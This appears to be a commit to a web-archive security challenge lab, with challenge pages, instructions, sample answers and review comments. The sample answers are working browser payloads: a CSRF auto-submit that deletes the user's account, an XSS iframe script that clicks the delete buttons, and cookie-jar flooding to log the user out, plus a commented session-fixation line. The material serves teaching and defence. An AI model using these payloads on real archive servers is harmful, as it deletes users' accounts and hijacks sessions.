Commit
Reorg, new challenges and sample answers
Showing 23 changed files with 252 additions and 96 deletions.
Submodule archive_server updated from 40cf08 to 31f556
Empty file.
@@ -0,0 +1,8 @@ | ||
# add /code to PYTHONPATH | ||
export PYTHONPATH=`pwd`:$PYTHONPATH | ||
|
||
# create users | ||
python webrecorder/admin.py -c david@example.com david Password1 archivist 'David Lightman' | ||
python webrecorder/admin.py -c jennifer@example.com jennifer Password1 archivist 'Jennifer Mack' | ||
|
||
uwsgi /code/apps/frontend.ini |
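Review bot: the comment on the first line says `/code` is added to `PYTHONPATH`, but the export uses `` `pwd` ``, so the script only works when launched from `/code`, while the last line hard-codes `/code/apps/frontend.ini`; make the two consistent with `export PYTHONPATH=/code:$PYTHONPATH` (or `$(dirname "$0")`), and add `set -e` at the top so a failing `admin.py -c` does not fall through to starting uwsgi. Both seeded accounts share the literal password `Password1`; that is reasonable for a local challenge lab, but a one-line comment saying the credentials are deliberately weak and must not be reused outside the lab would stop someone copying this script into a real deployment.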
This file was deleted.
This file was deleted.
This file was deleted.
This file was deleted.
File renamed without changes.
@@ -0,0 +1,10 @@ | ||
<html> | ||
<head> | ||
<script> | ||
// Write your answer here: | ||
</script> | ||
</head> | ||
<body> | ||
<p>When archived or played back, the script tag in this page should use cross-site request forgery to delete the current user account.</p> | ||
</body> | ||
</html> |
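Review bot: the `// Write your answer here:` prompt sits inside an empty `<script>` in `<head>`, but the accompanying sample answer also needs markup in `<body>` (a `<form method="post">` to submit cross-site); say in the comment that the body may be edited too, otherwise players will assume the solution must be script-only. The body text here says "archived or played back", which matches the challenge message; keep that wording in the sample answer as well.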
@@ -0,0 +1,9 @@ | ||
short_message = "Use cross-site request forgery to control an archive user's account." | ||
message = """ | ||
<p>In this challenge, the archive server is configured to disable cross-site request forgery protection. | ||
This means captured web content can submit web forms on behalf of a logged in user.</p> | ||
<p>Your mission is to edit {challenge_path}/challenge.html so that, when | ||
<a href="{challenge_url}challenge.html">{challenge_url}challenge.html</a> is captured or played back, | ||
the current user's account is deleted.</p> | ||
""" |
@@ -0,0 +1,18 @@ | ||
<html> | ||
<head> | ||
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script> | ||
<script> | ||
$(function(){ | ||
var deleteUrl = wbinfo.top_url.split('/').slice(0,4).join('/')+'/$delete'; | ||
$('#deleteForm').attr('action', deleteUrl); | ||
$('#deleteForm').submit(); | ||
}); | ||
</script> | ||
</head> | ||
<body> | ||
<p>When archived, the script tag in this page should use cross-site request forgery to delete the user account.</p> | ||
<form id="deleteForm" method="post" action=""> | ||
<input type="submit"> | ||
</form> | ||
</body> | ||
</html> |
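Review bot: nothing in this file defines `wbinfo`, so the script throws a `ReferenceError` and does nothing if that global is absent, and `wbinfo.top_url.split('/').slice(0,4)` assumes the scheme, empty segment, host and username are always the first four segments; guard with `if (typeof wbinfo !== 'undefined')` and comment where `top_url` comes from and why index 3 is the username. Loading jQuery from `ajax.googleapis.com` makes the answer depend on outbound network at capture time for a single line of work that `document.getElementById('deleteForm').submit()` does without it. The body text says "When archived" while `challenge.html` and the other two answers say "archived or played back"; use the same phrase.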
@@ -0,0 +1,10 @@ | ||
<html> | ||
<head> | ||
<script> | ||
// Write your answer here: | ||
</script> | ||
</head> | ||
<body> | ||
<p>When archived or played back, the script tag in this page should use cross-site scripting (XSS) to delete the current user account.</p> | ||
</body> | ||
</html> |
@@ -0,0 +1,11 @@ | ||
CONTENT_HOST = "warcgames.test:8089" | ||
short_message = "Use cross-site scripting (XSS) to control an archive user's account." | ||
message = """ | ||
<p>In this challenge, the archive server is configured to serve the user interface and captured web archive content | ||
on the same domain. This means captured web content can use cross-site scripting (XSS) to control user accounts on the | ||
archive server.</p> | ||
<p>Your mission is to edit {challenge_path}/challenge.html so that, when | ||
<a href="{challenge_url}challenge.html">{challenge_url}challenge.html</a> is captured or played back, | ||
the current user's account is deleted.</p> | ||
""" |
@@ -0,0 +1,29 @@ | ||
<html> | ||
<head> | ||
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script> | ||
<script> | ||
$(function(){ | ||
// get settings page URL | ||
var settingsUrl = wbinfo.top_url.split('/').slice(0,4).join('/')+'/_settings'; | ||
|
||
// add an iframe to the top level and navigate to settings | ||
$('body', window.__WB_top_frame.document).append('<iframe id="deleteFrame" src="'+settingsUrl+'"></iframe>'); | ||
|
||
// run inside iframe once a second, as a simple way to run once iframe is loaded | ||
setInterval(function(){ | ||
|
||
// get jquery reference to iframe contents | ||
var $iframe = $('#deleteFrame', window.__WB_top_frame.document).contents(); | ||
|
||
// click delete button and confirm | ||
$iframe.find('button[data-target="#confirm-delete-modal"]').click(); | ||
$iframe.find('#confirm-delete').click(); | ||
|
||
}, 1000); | ||
}); | ||
</script> | ||
</head> | ||
<body> | ||
<p>When archived or played back, the script tag in this page should use cross-site scripting (XSS) to delete the current user account.</p> | ||
</body> | ||
</html> |
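Review bot: the `setInterval` is never cleared, so the page keeps clicking into the iframe once a second for as long as it stays open, including after the account is gone and the iframe has navigated elsewhere; keep the id and stop once the confirm button has been found, e.g. `var timer = setInterval(function(){ ... if ($confirm.length) { $confirm.click(); clearInterval(timer); } }, 1000);`. The selectors `button[data-target="#confirm-delete-modal"]` and `#confirm-delete` are coupled to the settings page markup in the `archive_server` submodule, which this commit bumps from 40cf08 to 31f556; a comment naming the template they come from would help when that page changes. As in the CSRF answer, `wbinfo` is used without a guard.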
@@ -0,0 +1,10 @@ | ||
<html> | ||
<head> | ||
<script> | ||
// Write your answer here: | ||
</script> | ||
</head> | ||
<body> | ||
<p>When archived or played back, the script tag in this page should use top-level cookies to log out the current user.</p> | ||
</body> | ||
</html> |
@@ -0,0 +1,13 @@ | ||
CONTENT_HOST = "content.warcgames.test:8089" | ||
short_message = "Use top-level cookies to log out the current user." | ||
message = """ | ||
<p>In this challenge, the archive server is configured to serve captured web archive content at a subdomain | ||
of the user dashboard. This means that captured pages can overwrite session cookies with new top-level cookies.</p> | ||
<p>Your mission is to edit {challenge_path}/challenge.html so that, when | ||
<a href="{challenge_url}challenge.html">{challenge_url}challenge.html</a> is captured or played back, | ||
the current user is logged out.</p> | ||
<p><b>Bonus:</b> With a bit more effort, you can log in the user as a different user -- for example, any visitor | ||
could be logged into an account controlled by the attacker.</p> | ||
""" |
@@ -0,0 +1,17 @@ | ||
<html> | ||
<head> | ||
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script> | ||
<script> | ||
// fill up cookie jar to wipe login cookie | ||
for (i = 0; i < 1000; i++) { | ||
document.cookie = "cookie" + i + "=chocolate-chips;"; | ||
} | ||
|
||
// bonus: log the user in as the attacker, if you have a valid session key: | ||
// document.cookie = "__wr_sesh=someone_elses_session_key; domain=warcgames.test; path=/"; | ||
</script> | ||
</head> | ||
<body> | ||
<p>When archived, the script tag in this page should log out the user by deleting their session cookie.</p> | ||
</body> | ||
</html> |
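Review bot: `for (i = 0; i < 1000; i++)` assigns an implicit global; use `for (var i = 0; ...)`. jQuery is loaded from the Google CDN but never used, so drop the include. The eviction loop only works if the browser counts cookies set on `content.warcgames.test` against the same per-domain limit as `warcgames.test`, which neither the comment nor the challenge message states; say so in the comment so players understand why the loop logs the user out. Because the loop cookies carry no `domain=` attribute they attach to the content host only, so the bonus line (`domain=warcgames.test; path=/`) is the only one here that writes a genuine top-level cookie. The body text says "When archived" where `challenge.html` says "archived or played back".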